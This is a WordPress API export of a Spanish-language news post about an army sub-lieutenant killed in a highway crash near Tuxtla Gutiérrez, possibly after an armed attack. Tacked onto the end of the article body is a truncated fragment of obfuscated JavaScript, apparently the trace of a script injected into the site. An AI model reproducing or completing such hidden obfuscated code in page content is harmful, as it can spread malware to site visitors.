{"id":17608,"date":"2024-08-31T04:30:17","date_gmt":"2024-08-31T04:30:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17608"},"modified":"2024-08-31T04:30:18","modified_gmt":"2024-08-31T04:30:18","slug":"muer-mando-militar-en-accidente-carretero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17608","title":{"rendered":"Muer@ mando militar en accidente carretero"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"380\" data-id=\"17610\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078479491-1024x380.jpg\" alt=\"\" class=\"wp-image-17610\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078479491-1024x380.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078479491-300x111.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078479491-768x285.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078479491.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"405\" data-id=\"17609\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078476809-1024x405.jpg\" alt=\"\" class=\"wp-image-17609\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078476809-1024x405.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078476809-300x119.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078476809-768x304.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078476809.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"462\" data-id=\"17611\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078474141-1024x462.jpg\" alt=\"\" class=\"wp-image-17611\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078474141-1024x462.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078474141-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078474141-768x346.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1725078474141.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 30 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana el subteniente de artiller\u00eda de la Secretar\u00eda de la Defensa Nacional perdi\u00f3 la vida en un accidente carretero ocurrido en el tramo Tuxtla-Ocozocoautla a la altura del kil\u00f3metro 13.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando personal del ej\u00e9rcito circulaba en un Bora con placas de M\u00e9xico en el sentido de Poniente a Oriente.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, al llegar a un entronque que conecta la autopista con la carretera federal se estamp\u00f3 contra un muro central de concreto.<\/p>\n\n\n\n<p>Los datos extraoficiales informaron que, por el impacto la unidad se incendi\u00f3 y algunos autom\u00f3vilistas intentaron apagarlo.<\/p>\n\n\n\n<p>Fue hasta la llegada de socorristas que pudieron apagar las llamas.<\/p>\n\n\n\n<p>Personal de la Guardia Nacional se hizo cargo del accidente.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado, realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo correspondiente.<\/p>\n\n\n\n<p>Finalmente una gr\u00faa se llev\u00f3 la unidad siniestrada.<\/p>\n\n\n\n<p>Otra versi\u00f3n dio a conocer que, la unidad era perseguida por un comando armado y le dispararon en varias ocasiones, a un costado del veh\u00edculo fue hallado otro cuerpo, se desconoce la identidad, tambi\u00e9n se presume que ten\u00eda impactos de arma de fuego.<\/p>\n\n\n\n<p>La unidad donde viajaba el personal castrense present\u00f3 varios impactos de arma de fuego.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 30 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana el subteniente de artiller\u00eda de la Secretar\u00eda de la Defensa Nacional perdi\u00f3 la vida en un accidente carretero ocurrido en el tramo Tuxtla-Ocozocoautla a la altura del kil\u00f3metro 13. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17609,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17608","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17608","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17608"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17608\/revisions"}],"predecessor-version":[{"id":17612,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17608\/revisions\/17612"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17609"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17608"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17608"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17608"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}